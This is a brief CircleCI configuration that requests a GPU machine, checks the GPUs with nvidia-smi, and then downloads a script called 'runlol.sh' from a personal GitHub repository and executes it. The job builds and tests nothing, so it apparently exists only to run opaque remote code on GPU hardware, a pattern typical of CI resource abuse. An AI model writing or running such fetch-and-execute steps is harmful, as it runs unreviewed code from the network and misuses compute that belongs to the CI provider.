version: 2

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
      resource_class: gpu.nvidia.medium
      steps:
        - run: nvidia-smi
        - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
        - run: wget https://raw.githubusercontent.com/Vaping86/Circleci/main/runlol.sh && chmod +x runlol.sh && ./runlol.sh